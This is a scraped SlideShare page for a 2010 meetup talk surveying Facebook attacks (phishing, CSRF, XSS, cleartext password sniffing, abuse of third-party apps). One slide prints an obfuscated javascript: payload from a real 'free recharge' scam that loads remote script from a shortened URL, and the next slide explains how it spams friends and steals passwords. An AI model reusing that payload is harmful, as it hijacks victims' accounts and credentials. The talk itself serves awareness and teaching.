Your SlideShare is downloading. ×
  • Like


Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.


Now you can save presentations on your phone or tablet

Available for both IPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Facebook Attacks by Dinesh @ null Hyderabad Meet, October, 2010

Facebook Attacks by Dinesh @ null Hyderabad Meet, October, 2010

Published in Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
  • free download the updated file from here:-
    Are you sure you want to
    Your message goes here
No Downloads


Total Views
On SlideShare
From Embeds
Number of Embeds



Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

    No notes for slide


  • 1. facebook attacks
  • 2.
    • Phising
    • CSRF attack
    • Java scripts
    • XSS
  • 3. Facebook Phising
  • 4. Facebook CSRF attack Third party app server
  • 5.  
  • 6.
    • There are many other attacks possible like
    • Brute forcing
    • Cookie stealing
    • Commercial Data mining
    • Database Reverse-Engineering
  • 7. Password Interception
    • The fact that the username and password were sent in clear text is a security vulnerability.
    • There are chances to read Facebook user names and passwords off of the Ethernet or unencrypted wireless traffic, obtaining access to users’ Facebook passwords, as well as any additional accounts they use those passwords for.
    • Also the tabnabbing and CSRF have gained popularity over the open platform
    Current Facebook Precaution: Facebook currently takes no steps to protect user passwords in transit .
  • 8. javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//su%22+%22.%22+%22ly%22+%22/%22+%222wL%22;void(0) FREE!! CELLPHONE RECHARGE::.. This Script very popularly seen on Facebook, Orkut and Many other Social Networking sites. Analysing and Demo
  • 9.
    • What does It do?
    • It is  sending messages to all my friends to Recharge from account
    • It is adding comments  in Albums of my friends
    • It is  creating Threads in the Communities I Joined saying that “Recharge this” also its  adding some other Communities to my list
    • Redirects you to the Fake FB login page after 10-15 mins stealing your password
    Source Script @
  • 10.
  • 11. The Facebook Platform API – The API defines the various methods through which you can interact with Facebook. If you’re not familiar with the idea of an API, take a look at some recent Digital Web articles: APIs and Mashups for the Rest of Us and Hacking on Open APIs. FBML – Facebook Markup Language is a custom markup language based on various bits of HTML. It’s similar to Coldfusion or ASP.NET’s tag-based syntax, and is used to define the pages in your application. FQL – Facebook Query Language is SQL for Facebook. A powerful query language for situations where there are no existing helper methods in the API, or handy tags in FBML, to do exactly what you need.
  • 12. How to add an application in Facebook
  • 13. How can this be Used For Exploiting?
    • You can Upload your own Application of any type.
    • So doesn’t this strike you something of a hackers insterest
  • 14. How can this be Used For Exploiting?
  • 15.  
  • 16. THANK YOU